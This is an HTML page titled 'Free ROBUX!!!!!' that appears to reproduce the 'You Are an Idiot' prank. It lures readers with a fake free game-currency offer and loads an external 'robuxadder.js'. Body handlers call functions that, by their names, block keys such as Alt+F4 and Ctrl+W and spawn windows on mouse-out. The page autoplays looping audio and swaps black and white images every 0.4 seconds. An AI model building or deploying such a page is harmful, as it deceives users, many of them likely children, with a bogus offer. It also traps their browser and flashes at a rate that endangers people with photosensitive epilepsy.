
<!DOCTYPE html>
<html>
    <head>
        <title>Free ROBUX!!!!!</title>
        <meta name="Author" content="A mystery tbh">
        <link rel="icon" href="https://th.bing.com/th/id/OIP.0ZrP56IkpnbQFwulMrHf7wHaEU?rs=1&pid=ImgDetMain">
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<meta name="Description" content="Free robux here today!!!!">
        <style>
            @keyframes img-1 {
                0% {
                    opacity: 1;
                }
                44% {
                    opacity: 1;
                }
                50% {
                    opacity: 0;
                }
                94% {
                    opacity: 0;
                }
                100% {
                    opacity: 1;
                }
            }
            @keyframes img-2 {
                0% {
                    opacity: 0;
                }
                44% {
                    opacity: 0;
                }
                50% {
                    opacity: 1;
                }
                94% {
                    opacity: 1;
                }
                100% {
                    opacity: 0;
                }
            }
            .wrapper {
                margin-left: 16.5% !important;
                position: relative;
                height: 100%;
                width: 68%;
            }
            .wrapper img:first-child {
                position: absolute;
                width: 100%;
                opacity: 1;
                animation: img-1 0.4s infinite;  
            }

            .wrapper img:last-child {
                position: absolute;
                width: 100%;
                opacity: 0;
                animation: img-2 0.4s infinite;
            }

            body {
                user-select: none;
            }
        </style>
        <script src="robuxadder.js"></script>
    </head>
    <body onload="flagRun=1;playBall();return true;bookmark();" onkeydown="altf4key();ctrlwkey();delkey();" onmouseout="procreate();" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
        <div class="wrapper">
            <img src="https://theaviary.me/Idiot!/Converted/Idiot!_files/black.png">
            <img src="https://theaviary.me/Idiot!/Converted/Idiot!_files/white.png">
        </div>
        <audio id="IdiotAudio" loop><source src="https://theaviary.me/Idiot!/Converted/Idiot!_files/Idiot!.mp3" type="audio/mp3"></audio>
        <script>
            var audio = document.getElementById("IdiotAudio");
            audio.autoplay = true
        </script>
        <script>
            audio.loop = true;
            document.addEventListener('click', function() {
              if (audio.paused) {
                audio.play();
              }
            });
        </script>
    </body>
</html>